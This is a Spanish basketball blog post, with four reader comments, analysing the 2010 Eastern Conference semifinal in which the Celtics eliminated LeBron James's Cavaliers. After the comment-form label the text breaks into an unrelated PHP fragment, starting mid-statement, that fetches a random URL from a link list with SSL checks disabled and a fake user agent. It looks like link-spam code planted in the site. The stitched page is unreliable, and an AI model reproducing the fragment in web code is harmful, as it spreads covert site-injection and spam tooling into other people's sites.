Playoffs 2009-2010: Semifinales de Conferencia Este (y II)

15 de May de 2010 por TheDeerHunter

CAVS 2 – CELTICS 4

Podéis ver todos vuestros pronósticos. 23 apuestas y en ninguna de ellas aparecían los Celtics como finalistas de conferencia. Pero no sintáis (mucha) vergüenza… porque en los medios especializados la cosa no parecía pintar mucho mejor. 10 analistas profesionales en la ESPN y todos pronosticaban victoria para LeBron y los suyos. Apenas nadie contemplaba la posibilidad de la eliminación del campeón de regular a estas alturas o directamente todos habíamos dado por acabados a los ex-campeones Boston Celtics. Ahora parece casi sacrílego.

Pues bien, de muertos nada de nada. Muy mal hará Orlando en subestimarlos como lo hemos hecho todos. No creo, sin embargo, que la derrota de los Cavs haya venido de un exceso de confianza. Desde el primer minuto de la serie sufrieron los rigores del espíritu céltico en modo playoff y tiempo han tenido para corregirlo. Si es que de verdad eran tan superiores como todo el mundo aseguraba. El problema viene porque capacidad de corregir y de alterar el curso de todo sólo la han tenido Doc Rivers y sus Celtics. Mr. Mike Brown ha demostrado ser poco más que un atento espectador en asiento privilegiado.  Ya se pide su cabeza desde distintos medios.En algunas cosas sí acertamos en nuestro análisis. Una de ellas esa ventaja para Rivers en el duelo de banquillos. Otra es la aportación de Rondo. La extensión de Doc Rivers en la cancha.

Fue en aquel cuarto partido donde se fraguó el naufragio de los Cavaliers. Recordemos que venían de arrasar en el Garden en el 3º con esos 21-8-7 de LeBron en el primer cuarto, poniendo un 2-1 en una serie en la que hasta ese momento los Cetics habían sido superiores. El 4º fue complicadísimo mentalmente para los Celtics en general y para el “Big Three” en particular. La eliminatoria se hubiera marchado definitivamente de no haber sido por la actuación ya mítica de Rajon Rondo y también, ojo, por la irrupción de Tony Allen cuando nadie esperaba la más mínima aportación de la segunda unidad.

Después todos conocemos el resto. El sensacional 5º encuentro donde secaron a LeBron y la culminación en el 6º, ante la impotencia de Brown y el caos que fue su equipo.

Después podríamos hablar de lo de “secar a LeBron” o secar al resto… pero es que esto, más que acierto nuestro en el análisis es consecuencia de la riqueza táctica de Rivers y del fracaso en las oposición de Brown, retroalimentándonos en las dos primeras claves.
¿Qué ha pasado con Jamison, Shaq… las incorporaciones que debían de hacer este equipo campeón? Muchos lo dieron por seguro tras el trade-line de febrero. ¿Dónde irá LeBron este próximo curso? Tras dos decepciones seguidas de esta magnitud se avecina tormenta en casa del MVP.

MVP: Doc Rivers y Rajon Rondo. Compartido. Ya hemos hablado de ellos.

La sorpresa: Tony Allen. Para muestra un botón:

La decepción: Antawn Jamison. Para muestra el botón anterior.

El mayor esfuerzo en vano: 27 puntos, 9 rebotes, 7 asistencias, 2 robos y más de un tapón. No sólo que no le sirven a LeBron para ganar una serie sino que le hacen replantearse muchas cosas…

Y así os lo contamos nosotros:

Cavs 101 – Celtics 93

Cavs 86 – Celtics 104

Celtics 95 – Cavs 124

Celtics 97 – Cavs 87

Cavs 88 – Celtics 120

Celtics 94 – Cavs 85

Comenta

4 comentarios a esta entrada

  1. sergio dice:
    #1

    La decepcion compartida con Mo Williams… aunque no salga en el boton jaja.

      Citar

  2. miluco dice:
    #2

    quien es cleveland sino un equipo lleno de jugadores de medio pelo. Varejao, Williams, Parker, Jamison, West, y con eso pretendìan ganar un anillo???????? yo si bien estaba segurisimo de q orlando se los volveria a petar otra vez, no estaba seguro de q boston les fuera a eliminar, q e la año pasao orlando les metio un 4-1 q perfectamente podia haber sio 4-0, y este año boston ha ganao 4-2 y con la gorra…danny ferry ha echo un buen trabajo porq practicamente ha fichao lo mejor q le permitia el mercado…xo chico eso noes suficiente para ganar el anillo cuando tienes un entrenador tan negado como es mike brown…

      Citar

  3. MagicJohnson32 dice:
    #3

    Sólo puedo decir una cosa: ¡¡Qué grandes son los Playoffs!!

      Citar

  4. kantonyo dice:
    #4

    Smile for the Poster!!!! JUASSSSSSSS XD

    Buenísimo!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>